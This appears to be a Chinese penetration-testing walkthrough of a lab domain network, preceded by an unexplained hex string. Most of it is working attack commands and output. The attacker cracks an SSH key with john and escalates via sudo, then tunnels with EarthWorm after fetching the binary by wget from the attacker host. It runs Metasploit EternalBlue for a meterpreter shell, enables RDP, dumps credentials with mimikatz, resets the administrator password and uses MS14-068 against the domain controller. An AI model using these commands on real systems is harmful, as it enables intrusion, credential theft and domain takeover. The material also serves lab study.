091f50f86933c6ec7849bf9ef8cb10dc691b964d486a8535a812ae59903f6d2703c2eaeeadff75f01efc7c3a3b2f0a1f0088cef99b45d5f03bbdd50ddb8e6b7b4f30c16c6ba1fb59075c1e90285c2e43ff6fd8b8adc60e653434ef7b909932b425013ca2fd1584d5ecae8f1a676c538bd53987e8b1e29d85f82356d60363b7ac5cc19fdbe3d1a8a455aff76984fdaec1d1bbb31e37391005bb6e924cee33b1bb65cb88fc061b4caab6a3b24784edeb6e239c776da0e8c13cd0985595750d9493e4db4bbe45eb1c809289ed14cb70b8aacb4f101dea677adabc8a3c26465ec36180d306bcb7d07a43fc97416cbe8eb2cb468feb92339d2890f18dfbd7cd7a60f32137d60e3f5a37c90765f231431be5c7478adbc2b17bba05fcd008be95771319bbcc1a2807336a1ccdc79298591f08ca49658db19b16e1dd55b9344b6a94d04583ed3804b96421fab550c8bd053d83c92cc506f96bf3125d4d0d50c0679b858e82df93e79b71b3a3e5732b3e1822f3743ffb11e162b8d9486787b2402042f233786b33e6f9958e47e3f7cc72cf4724c6866f18247af46868086c9e109be246af3d1c200dcda3915c884b4fc6ad61024b2d9fddd905e5e4a481adc88dc2adf3dd2d2a3597a2a2d55fd48feacbab722a2e2e1a9f1559d7910afb1103d9097717b19e599d5237af7008fbe78923eba4aff484f6e36ceeec59bc4124edbaa36928838e75a32af48b7db1117ae17dabab7420a3588aee0bf78563f6fa00d348e5adf8524b377d78592c2daadb09d387fd36c332a859991f89a9acfcfaa250f1d89dca7a0d0f03d9d1ceba9dcaaf6f2734947eb1d5179bf15772ec9aae0258c89d0287221bfb546799c2c879dc57fe6f0d9b2f8529bf1ddfa6a296bf5a9767f41dc28d3dfbfc6bc1610d2b718f69435336dda78ab472aab962ce8c913c98e9ea3112a1aa6aa8f611e2a7ab3778372756f1b4c77f31689a5f39ddaed640421c1fc83edd15f51ef9973fe3e040166faa4b0532d86a08f6fff23182eb38e3d3ffd5252adfa7268249fc40ed539cf08d56a60dab602d5edf7e83771205d4f614ab160a3ed31efaf7394b6e15e8dbadb6f91faedbf73135bc

ssh2john工具可以把ssh密钥编译成哈希散列。

  1. john
  2. ┌──(root㉿ru)-[~/kali]
  3. └─# john hash --wordlist=/usr/share/wordlists/rockyou.txt
  4. Using default input encoding: UTF-8
  5. Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
  6. Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
  7. Cost 2 (iteration count) is 1 for all loaded hashes
  8. Will run 2 OpenMP threads
  9. Press 'q' or Ctrl-C to abort, almost any other key for status
  10. ubuntu (id_rsa)
  11. 1g 0:00:00:00 DONE (2023-12-13 13:22) 20.00g/s 2899Kp/s 2899Kc/s 2899KC/s unicorn5..tylerray
  12. Use the "--show" option to display all of the cracked passwords reliably
  13. Session completed.
  14. 密码是:ubuntu

  1. ssh登录
  2. 我们使用id_rs私钥进行登录
  3. ┌──(root㉿ru)-[~/kali]
  4. └─# ssh ubuntu@192.168.12.132 -i id_rsa
  5. Enter passphrase for key 'id_rsa':
  6. ubuntu@192.168.12.132's password:
  7. Welcome to Ubuntu 14.04.6 LTS (GNU/Linux 4.4.0-142-generic x86_64)
  8. * Documentation: https://help.ubuntu.com/
  9. Your Hardware Enablement Stack (HWE) is supported until April 2019.
  10. Last login: Thu Jan 23 20:50:17 2020 from 192.168.157.128
  11. ubuntu@ubuntu:~$ id
  12. uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),124(sambashare)

当然我们也可以利用shadow文件,shadow文件存储了用户的hash散列,直接用john进行爆破即可!

内网渗透

内网信息探测

1、su root
  1. ubuntu@ubuntu:/$ sudo -l
  2. [sudo] password for ubuntu:
  3. Matching Defaults entries for ubuntu on ubuntu:
  4. env_reset, mail_badpass,
  5. secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
  6. User ubuntu may run the following commands on ubuntu:
  7. (ALL : ALL) ALL
  8. ubuntu@ubuntu:/$
  9. 这个ubuntu用户具有全部的权限,那么我们直接提权。

  1. ubuntu@ubuntu:/$ sudo /bin/bash
  2. root@ubuntu:/root# id
  3. uid=0(root) gid=0(root) groups=0(root)
  4. root@ubuntu:/root#

2、内网信息收集
使用earthworm内网穿透工具进行渗透,我们如果单纯把fscan扫描工具上传到靶机里是不行的,因为编译的版本不一样的!运行不了的!所以我们使用内网穿透工具,用本地的流量进行渗透。

  1. ┌──(root㉿ru)-[~/tools/neiwang/fscan/fscan]
  2. └─# cat /etc/proxychains4.conf | grep "socks5"
  3. # socks5 192.168.67.78 1080 lamer secret
  4. # proxy types: http, socks4, socks5, raw
  5. #socks5 127.0.0.1 2222
  6. #socks5 116.211.207.100 8080
  7. socks5 127.0.0.1 2222

  1. ┌──(root㉿ru)-[~//earthworm/server/download/ew]
  2. └─# vim /etc/proxychains4.conf
  3. ┌──(root㉿ru)-[~//earthworm/server/download/ew]
  4. └─# ./ew_for_linux64 -s rcsocks -l 2222 -e 3333
  5. rcsocks 0.0.0.0:2222 <--[10000 usec]--> 0.0.0.0:3333
  6. init cmd_server_for_rc here
  7. start listen port here
  8. ./ew_for_linux64 -s rcsocks -l 2222-e 3333
  9. #将2222端口监听到的本地数据转发到 web服务器的2222端口
  10. # 通过2222端口,将本地流量转发出去
  11. #rcsocks、rssocks 用于反向连接
  12. #ssocks 用于正向连接
  13. # -l 指定本地监听的端口
  14. # -e 指定要反弹到的机器端口
  15. # -d 指定要反弹到机器的IP
  16. # -f 指定要主动连接的机器 ip
  17. # -g 指定要主动连接的机器端口
  18. # -t 指定超时时长,默认为 1000

  1. root@ubuntu:/tmp# wget http://192.168.12.128/ew_for_linux64
  2. --2023-12-12 22:07:07-- http://192.168.12.128/ew_for_linux64
  3. Connecting to 192.168.12.128:80... connected.
  4. HTTP request sent, awaiting response... 200 OK
  5. Length: 28080 (27K) [application/octet-stream]
  6. Saving to: ‘ew_for_linux64
  7. 100%[======================================>] 28,080 --.-K/s in 0s
  8. 2023-12-12 22:07:07 (253 MB/s) - ‘ew_for_linux64’ saved [28080/28080]
  9. root@ubuntu:/tmp# chmod +x ew_for_linux64
  10. root@ubuntu:/tmp# ls
  11. config-err-jE7nYK ew_for_linux64 fscan unity_support_test.0 vmware-root
  12. root@ubuntu:/tmp# ./ew_for_linux64 -s rssocks -d 192.168.12.128 -e 3333
  13. rssocks 192.168.12.128:3333 <--[10000 usec]--> socks server
  14. #将流量通过3333端口传到192.168.16.128主机上
  15. #rcsocks、rssocks 用于反向连接
  16. #ssocks 用于正向连接
  17. # -l 指定本地监听的端口
  18. # -e 指定要反弹到的机器端口
  19. # -d 指定要反弹到机器的IP
  20. # -f 指定要主动连接的机器 ip
  21. # -g 指定要主动连接的机器端口
  22. # -t 指定超时时长,默认为 1000

  1. ┌──(root㉿ru)-[~/tools/neiwang/fscan/fscan]
  2. └─# proxychains ./fscan -h 192.168.183.0/24
  3. [proxychains] config file found: /etc/proxychains4.conf
  4. [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
  5. [proxychains] DLL init: proxychains-ng 4.16
  6. ___ _
  7. / _ \ ___ ___ _ __ __ _ ___| | __
  8. / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
  9. / /_\\_____\__ \ (__| | | (_| | (__| <
  10. \____/ |___/\___|_| \__,_|\___|_|\_\
  11. fscan version: 1.8.3
  12. start infoscan
  13. (icmp) Target 192.168.183.1 is alive
  14. (icmp) Target 192.168.183.128 is alive
  15. (icmp) Target 192.168.183.130 is alive
  16. (icmp) Target 192.168.183.129 is alive
  17. [*] Icmp alive hosts len is: 4
  18. 192.168.183.1:7680 open
  19. 192.168.183.130:88 open
  20. 192.168.183.129:445 open
  21. 192.168.183.130:445 open
  22. 192.168.183.1:445 open
  23. 192.168.183.129:139 open
  24. 192.168.183.130:139 open
  25. 192.168.183.129:135 open
  26. 192.168.183.130:135 open
  27. 192.168.183.1:139 open
  28. 192.168.183.1:135 open
  29. 192.168.183.1:8834 open
  30. 192.168.183.128:22 open
  31. [*] alive ports len is: 13
  32. start vulscan
  33. [*] NetInfo
  34. [*]192.168.183.1
  35. [->]芽衣子
  36. [->]192.168.56.1
  37. [->]192.168.12.1
  38. [->]192.168.169.131
  39. [->]240e:45a:8c85:4d7:6854:4bab:5f69:b5fc
  40. [->]240e:45a:8c85:4d7:695e:1457:49d2:7f69
  41. [*] NetInfo
  42. [*]192.168.183.130
  43. [->]WIN-ENS2VR5TR3N
  44. [->]192.168.183.130
  45. [*] NetInfo
  46. [*]192.168.183.129
  47. [->]TESTWIN7-PC
  48. [->]192.168.183.129
  49. [*] NetBios 192.168.183.130 [+] DC:WIN-ENS2VR5TR3N.demo.com Windows Server 2008 HPC Edition 7601 Service Pack 1
  50. [+] MS17-010 192.168.183.130 (Windows Server 2008 HPC Edition 7601 Service Pack 1)
  51. [+] MS17-010 192.168.183.129 (Windows 7 Enterprise 7601 Service Pack 1)
  52. [*] WebTitle https://192.168.183.1:8834 code:200 len:1138 title:Nessus

  1. ubuntu: 192.168.183.128
  2. win7192.168.183.129
  3. win2008192.168.183.130
  4. 到此内网两台主机全部拿到了,dc是win2008
  5. 内网两台主机都存在永恒之蓝漏洞!

内网漏洞利用

1、win7
  1. search ms17-010
  2. use 0
  3. set rhosts 192.168.183.129
  4. set target 1
  5. set payload windows/x64/meterpreter/bind_tcp
  6. msf6 exploit(windows/smb/ms17_010_eternalblue) > options
  7. Module options (exploit/windows/smb/ms17_010_eternalblue):
  8. Name Current Setting Required Description
  9. ---- --------------- -------- -----------
  10. RHOSTS 192.168.183.129 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-m
  11. etasploit.html
  12. RPORT 445 yes The target port (TCP)
  13. SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Windows Server 200
  14. 8 R2, Windows 7, Windows Embedded Standard 7 target machines.
  15. SMBPass no (Optional) The password for the specified username
  16. SMBUser no (Optional) The username to authenticate as
  17. VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2
  18. , Windows 7, Windows Embedded Standard 7 target machines.
  19. VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows
  20. 7, Windows Embedded Standard 7 target machines.
  21. Payload options (windows/x64/meterpreter/bind_tcp):
  22. Name Current Setting Required Description
  23. ---- --------------- -------- -----------
  24. EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
  25. LPORT 4444 yes The listen port
  26. RHOST 192.168.183.129 no The target address
  27. Exploit target:
  28. Id Name
  29. -- ----
  30. 1 Windows 7
  31. View the full module info with the info, or info -d command.
  32. msf6 exploit(windows/smb/ms17_010_eternalblue) > setg proxyis socks5:127.0.0.1:2222
  33. proxyis => socks5:127.0.0.1:2222

  1. msf6 exploit(windows/smb/ms17_010_eternalblue) > run
  2. [*] 192.168.183.129:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
  3. [+] 192.168.183.129:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Enterprise 7601 Service Pack 1 x64 (64-bit)
  4. [*] 192.168.183.129:445 - Scanned 1 of 1 hosts (100% complete)
  5. [+] 192.168.183.129:445 - The target is vulnerable.
  6. [*] 192.168.183.129:445 - Connecting to target for exploitation.
  7. [+] 192.168.183.129:445 - Connection established for exploitation.
  8. [+] 192.168.183.129:445 - Target OS selected valid for OS indicated by SMB reply
  9. [*] 192.168.183.129:445 - CORE raw buffer dump (40 bytes)
  10. [*] 192.168.183.129:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 45 6e 74 65 72 70 Windows 7 Enterp
  11. [*] 192.168.183.129:445 - 0x00000010 72 69 73 65 20 37 36 30 31 20 53 65 72 76 69 63 rise 7601 Servic
  12. [*] 192.168.183.129:445 - 0x00000020 65 20 50 61 63 6b 20 31 e Pack 1
  13. [+] 192.168.183.129:445 - Target arch selected valid for arch indicated by DCE/RPC reply
  14. [*] 192.168.183.129:445 - Trying exploit with 12 Groom Allocations.
  15. [*] 192.168.183.129:445 - Sending all but last fragment of exploit packet
  16. [*] 192.168.183.129:445 - Starting non-paged pool grooming
  17. [+] 192.168.183.129:445 - Sending SMBv2 buffers
  18. [+] 192.168.183.129:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
  19. [*] 192.168.183.129:445 - Sending final SMBv2 buffers.
  20. [*] 192.168.183.129:445 - Sending last fragment of exploit packet!
  21. [*] 192.168.183.129:445 - Receiving response from exploit packet
  22. [+] 192.168.183.129:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
  23. [*] 192.168.183.129:445 - Sending egg to corrupted connection.
  24. [*] 192.168.183.129:445 - Triggering free of corrupted buffer.
  25. [*] Started bind TCP handler against 192.168.183.129:4444
  26. [*] Sending stage (200774 bytes) to 192.168.183.129
  27. [*] Meterpreter session 1 opened (127.0.0.1:42943 -> 127.0.0.1:2222) at 2023-12-13 14:56:32 +0800
  28. [+] 192.168.183.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  29. [+] 192.168.183.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  30. [+] 192.168.183.129:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  31. meterpreter >
  32. 这样就拿到了win7的meterpreter了。

  1. meterpreter > sysinfo
  2. Computer : TESTWIN7-PC
  3. OS : Windows 7 (6.1 Build 7601, Service Pack 1).
  4. Architecture : x64
  5. System Language : zh_CN
  6. Domain : DEMO
  7. Logged On Users : 2
  8. Meterpreter : x64/windows
  9. meterpreter > shell
  10. Process 2728 created.
  11. Channel 1 created.
  12. Microsoft Windows [�汾 6.1.7601]
  13. ��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����
  14. C:\Windows\system32>chcp 65001
  15. chcp 65001
  16. Active code page: 65001
  17. C:\Windows\system32>ipconfig /all
  18. ipconfig /all
  19. Windows IP Configuration
  20. Host Name . . . . . . . . . . . . : TESTWIN7-PC
  21. Primary Dns Suffix . . . . . . . : demo.com
  22. Node Type . . . . . . . . . . . . : Hybrid
  23. IP Routing Enabled. . . . . . . . : No
  24. WINS Proxy Enabled. . . . . . . . : No
  25. DNS Suffix Search List. . . . . . : demo.com
  26. localdomain
  27. Ethernet adapter ��������:
  28. Connection-specific DNS Suffix . : localdomain
  29. Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
  30. Physical Address. . . . . . . . . : 00-0C-29-F7-8E-C7
  31. DHCP Enabled. . . . . . . . . . . : Yes
  32. Autoconfiguration Enabled . . . . : Yes
  33. Link-local IPv6 Address . . . . . : fe80::c94f:75:2aa:5374%11(Preferred)
  34. IPv4 Address. . . . . . . . . . . : 192.168.183.129(Preferred)
  35. Subnet Mask . . . . . . . . . . . : 255.255.255.0
  36. Lease Obtained. . . . . . . . . . : 2023��12��13�� 14:14:29
  37. Lease Expires . . . . . . . . . . : 2023��12��13�� 15:29:32
  38. Default Gateway . . . . . . . . . :
  39. DHCP Server . . . . . . . . . . . : 192.168.183.254
  40. DHCPv6 IAID . . . . . . . . . . . : 234884137
  41. DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-25-9C-6B-AC-00-0C-29-43-CC-F2
  42. DNS Servers . . . . . . . . . . . : 192.168.183.130
  43. NetBIOS over Tcpip. . . . . . . . : Enabled
  44. Tunnel adapter isatap.localdomain:
  45. Media State . . . . . . . . . . . : Media disconnected
  46. Connection-specific DNS Suffix . : localdomain
  47. Description . . . . . . . . . . . : Microsoft ISATAP Adapter #2
  48. Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
  49. DHCP Enabled. . . . . . . . . . . : No
  50. Autoconfiguration Enabled . . . . : Yes
  51. C:\Windows\system32>netstat -ano
  52. netstat -ano
  53. �����
  54. Э�� ���ص� �ⲿ�� ״ PID
  55. TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 732
  56. TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
  57. TCP 0.0.0.0:5357 0.0.0.0:0 LISTENING 4
  58. TCP 0.0.0.0:49152 0.0.0.0:0 LISTENING 396
  59. TCP 0.0.0.0:49153 0.0.0.0:0 LISTENING 772
  60. TCP 0.0.0.0:49154 0.0.0.0:0 LISTENING 928
  61. TCP 0.0.0.0:49155 0.0.0.0:0 LISTENING 496
  62. TCP 0.0.0.0:49162 0.0.0.0:0 LISTENING 1884
  63. TCP 0.0.0.0:49180 0.0.0.0:0 LISTENING 512
  64. TCP 192.168.183.129:139 0.0.0.0:0 LISTENING 4
  65. TCP 192.168.183.129:4444 192.168.183.128:39198 ESTABLISHED 1180
  66. TCP 192.168.183.129:49355 192.168.183.130:135 TIME_WAIT 0
  67. TCP 192.168.183.129:49356 192.168.183.130:49158 TIME_WAIT 0
  68. TCP [::]:135 [::]:0 LISTENING 732
  69. TCP [::]:445 [::]:0 LISTENING 4
  70. TCP [::]:5357 [::]:0 LISTENING 4
  71. TCP [::]:49152 [::]:0 LISTENING 396
  72. TCP [::]:49153 [::]:0 LISTENING 772
  73. TCP [::]:49154 [::]:0 LISTENING 928
  74. TCP [::]:49155 [::]:0 LISTENING 496
  75. TCP [::]:49162 [::]:0 LISTENING 1884
  76. TCP [::]:49180 [::]:0 LISTENING 512
  77. UDP 0.0.0.0:123 *:* 388
  78. UDP 0.0.0.0:500 *:* 928
  79. UDP 0.0.0.0:3702 *:* 1340
  80. UDP 0.0.0.0:3702 *:* 1340
  81. UDP 0.0.0.0:4500 *:* 928
  82. UDP 0.0.0.0:5355 *:* 1088
  83. UDP 0.0.0.0:53937 *:* 1340
  84. UDP 127.0.0.1:59981 *:* 928
  85. UDP 127.0.0.1:65006 *:* 1088
  86. UDP 127.0.0.1:65287 *:* 512
  87. UDP 192.168.183.129:137 *:* 4
  88. UDP 192.168.183.129:138 *:* 4
  89. UDP [::]:123 *:* 388
  90. UDP [::]:500 *:* 928
  91. UDP [::]:3702 *:* 1340
  92. UDP [::]:3702 *:* 1340
  93. UDP [::]:4500 *:* 928
  94. UDP [::]:5355 *:* 1088
  95. UDP [::]:53938 *:*
  96. 没有开启3389端口!

  1. ##注册表开启远程桌面
  2. REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

  1. C:\Windows\system32>REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
  2. REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
  3. �����ɹ����ɡ�
  4. C:\Windows\system32>netstat -ano | findstr 3389
  5. netstat -ano | findstr 3389
  6. TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING 1088
  7. TCP [::]:3389 [::]:0 LISTENING 1088
  8. C:\Windows\system32>
  9. 开启成功!

  1. 密码抓取
  2. meterpreter > load kiwi
  3. Loading extension kiwi...
  4. .#####. mimikatz 2.2.0 20191125 (x64/windows)
  5. .## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
  6. ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
  7. ## \ / ## > http://blog.gentilkiwi.com/mimikatz
  8. '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
  9. '#####' > http://pingcastle.com / http://mysmartlogon.com ***/
  10. Success.
  11. meterpreter > creds_all
  12. [+] Running as SYSTEM
  13. [*] Retrieving all credentials
  14. msv credentials
  15. ===============
  16. Username Domain NTLM SHA1
  17. -------- ------ ---- ----
  18. TESTWIN7-PC$ DEMO e3ba914bdaca29c197c7191ebf521873 68a1422322c303e4c24d63f381a03b34eb434477
  19. douser DEMO bc23b0b4d5bf5ff42bc61fb62e13886e c48096437367aad00ac2dc70552051cd84912a55
  20. wdigest credentials
  21. ===================
  22. Username Domain Password
  23. -------- ------ --------
  24. (null) (null) (null)
  25. TESTWIN7-PC$ DEMO /-LDA[1d hf-tfj)O)yNyCgh[o#D[h7I/*-'ShnKX%X7`wWWdrLDd`!EUceLQ8:y!J?TD5KY*iuQ32i8He_D#JyWDWIzuYDDytr)\J7(_e(Fcts
  26. jl.Zd"JRr
  27. douser DEMO Dotest123
  28. kerberos credentials
  29. ====================
  30. Username Domain Password
  31. -------- ------ --------
  32. (null) (null) (null)
  33. douser DEMO.COM (null)
  34. testwin7-pc$ demo.com /-LDA[1d hf-tfj)O)yNyCgh[o#D[h7I/*-'ShnKX%X7`wWWdrLDd`!EUceLQ8:y!J?TD5KY*iuQ32i8He_D#JyWDWIzuYDDytr)\J7(_e(Fc
  35. tsjl.Zd"JRr
  36. testwin7-pc$ DEMO.COM /-LDA[1d hf-tfj)O)yNyCgh[o#D[h7I/*-'ShnKX%X7`wWWdrLDd`!EUceLQ8:y!J?TD5KY*iuQ32i8He_D#JyWDWIzuYDDytr)\J7(_e(Fc
  37. tsjl.Zd"JRr
  38. meterpreter >
  39. 账号: win7 : douser DEMO Dotest123


登录失败,可能是需要我们重新验证关系,那我们直接改掉系统管理员密码得了!

  1. meterpreter > shell
  2. Process 992 created.
  3. Channel 1 created.
  4. Microsoft Windows [�汾 6.1.7601]
  5. ��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����
  6. C:\Windows\system32>chcp 65001
  7. chcp 65001
  8. Active code page: 65001
  9. C:\Windows\system32>net user administrator Admin@123
  10. net user administrator Admin@123
  11. The command completed successfully.
  12. C:\Windows\system32>net user administrator /active:yes
  13. net user administrator /active:yes
  14. The command completed successfully.


ok,win7拿下!


2、win2008 域控主机
  1. 我们要进行一个域内渗透
  2. 利用win7里面的ms14-068


  1. 我们先迁移一个域sid号码!
  2. meterpreter > ps -ef
  3. Process List
  4. ============
  5. PID PPID Name Arch Session User Path
  6. --- ---- ---- ---- ------- ---- ----
  7. 0 0 [System Process]
  8. 4 0 System x64 0
  9. 100 2240 csrss.exe x64 3 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
  10. 260 4 smss.exe x64 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
  11. 344 332 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
  12. 388 496 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
  13. 396 332 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\wininit.exe
  14. 404 388 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
  15. 452 388 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\system32\winlogon.exe
  16. 496 396 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\services.exe
  17. 512 396 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsass.exe
  18. 520 396 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsm.exe
  19. 584 2176 winlogon.exe x64 2 NT AUTHORITY\SYSTEM C:\Windows\system32\winlogon.exe
  20. 616 1724 powershell.exe x64 1 DEMO\douser C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.ex
  21. e
  22. 624 496 svchost.exe x64 0 NT AUTHORITY\SYSTEM
  23. 688 496 vmacthlp.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmacthlp.exe
  24. 716 1180 cmd.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\cmd.exe
  25. 728 344 conhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\conhost.exe
  26. 732 496 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
  27. 740 1548 explorer.exe x64 2 testwin7-PC\Administrator C:\Windows\Explorer.EXE
  28. 772 496 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
  29. 900 496 svchost.exe x64 0 NT AUTHORITY\SYSTEM
  30. 928 496 svchost.exe x64 0 NT AUTHORITY\SYSTEM
  31. 1040 496 dllhost.exe x64 0 NT AUTHORITY\SYSTEM
  32. 1088 496 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
  33. 1180 496 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
  34. 1216 496 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
  35. 1340 496 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
  36. 1452 496 VGAuthService.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAut
  37. hService.exe
  38. 1480 496 vmtoolsd.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
  39. 1560 496 msdtc.exe x64 0 NT AUTHORITY\NETWORK SERVICE
  40. 1620 2624 LogonUI.exe x64 3 NT AUTHORITY\SYSTEM C:\Windows\system32\LogonUI.exe
  41. 1724 280 explorer.exe x64 1 DEMO\douser C:\Windows\Explorer.EXE
  42. 1820 1724 vmtoolsd.exe x64 1 DEMO\douser C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
  43. 1884 496 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
  44. 1956 900 dwm.exe x64 2 testwin7-PC\Administrator C:\Windows\system32\Dwm.exe
  45. 1988 624 WmiPrvSE.exe
  46. 2136 404 conhost.exe x64 1 DEMO\douser C:\Windows\system32\conhost.exe
  47. 2164 344 conhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\conhost.exe
  48. 2176 1088 rdpclip.exe x64 2 testwin7-PC\Administrator C:\Windows\system32\rdpclip.exe
  49. 2180 344 conhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\conhost.exe
  50. 2268 496 taskhost.exe x64 1 DEMO\douser C:\Windows\system32\taskhost.exe
  51. 2284 344 conhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\conhost.exe
  52. 2296 496 svchost.exe x64 0 NT AUTHORITY\SYSTEM
  53. 2432 1180 cmd.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\cmd.exe
  54. 2624 2240 winlogon.exe x64 3 NT AUTHORITY\SYSTEM C:\Windows\system32\winlogon.exe
  55. 2728 1180 cmd.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\cmd.exe
  56. 2784 2176 csrss.exe x64 2 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe
  57. 2804 496 sppsvc.exe x64 0 NT AUTHORITY\NETWORK SERVICE
  58. 2820 496 taskhost.exe x64 2 testwin7-PC\Administrator C:\Windows\system32\taskhost.exe
  59. 2868 496 SearchIndexer.exe x64 0 NT AUTHORITY\SYSTEM
  60. 2904 900 dwm.exe x64 1 DEMO\douser C:\Windows\system32\Dwm.exe
  61. 3028 1180 cmd.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\system32\cmd.exe
  62. 3784 740 vmtoolsd.exe x64 2 testwin7-PC\Administrator C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
  63. 3940 740 cmd.exe x64 2 testwin7-PC\Administrator C:\Windows\System32\cmd.exe
  64. 4024 2784 conhost.exe x64 2 testwin7-PC\Administrator C:\Windows\system32\conhost.exe
  65. meterpreter > migrate 2904
  66. [*] Migrating from 1180 to 2904...
  67. [*] Migration completed successfully.
  68. meterpreter > getuid
  69. Server username: DEMO\douser
  70. meterpreter > shell
  71. Process 3956 created.
  72. Channel 1 created.
  73. Microsoft Windows [�汾 6.1.7601]
  74. ��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����
  75. C:\Windows\system32>chcp 65001
  76. chcp 65001
  77. Active code page: 65001
  78. C:\Windows\system32>whomai /user
  79. whomai /user
  80. 'whomai' is not recognized as an internal or external command,
  81. operable program or batch file.
  82. C:\Windows\system32>whoami /user
  83. whoami /user
  84. USER INFORMATION
  85. ----------------
  86. User Name SID
  87. =========== =============================================
  88. demo\douser S-1-5-21-979886063-1111900045-1414766810-1107

  1. 迁移的进程号:2904
  2. sid:S-1-5-21-979886063-1111900045-1414766810-1107
  3. user: douer
  4. pass: Dotest123

  1. C:\Users\douser\Desktop>MS14-068
  2. USAGE:
  3. MS14-068 -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr>
  4. OPTIONS:
  5. -p <clearPassword>
  6. --rc4 <ntlmHash>
  7. C:\Users\douser\Desktop>
  8. C:\Windows\system32>net time /domain
  9. net time /domain
  10. Current time at \\WIN-ENS2VR5TR3N.demo.com is 2023/12/13 15:45:51
  11. The command completed successfully.
  12. C:\Windows\system32>ping demo.com
  13. ping demo.com
  14. Pinging demo.com [192.168.183.130] with 32 bytes of data:
  15. Reply from 192.168.183.130: bytes=32 time<1ms TTL=128
  16. Reply from 192.168.183.130: bytes=32 time=1ms TTL=128
  17. Reply from 192.168.183.130: bytes=32 time=1ms TTL=128
  18. Reply from 192.168.183.130: bytes=32 time=1ms TTL=128
  19. Ping statistics for 192.168.183.130:
  20. Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
  21. Approximate round trip times in milli-seconds:
  22. Minimum = 0ms, Maximum = 1ms, Average = 0ms

  1. payload
  2. MS14-068 -u douer@demo.com -s S-1-5-21-979886063-1111900045-1414766810-1107 -d 192.168.183.130 -p Dotest123


  1. 运行完之后,运行猕猴桃 ————> mimikatz.exe
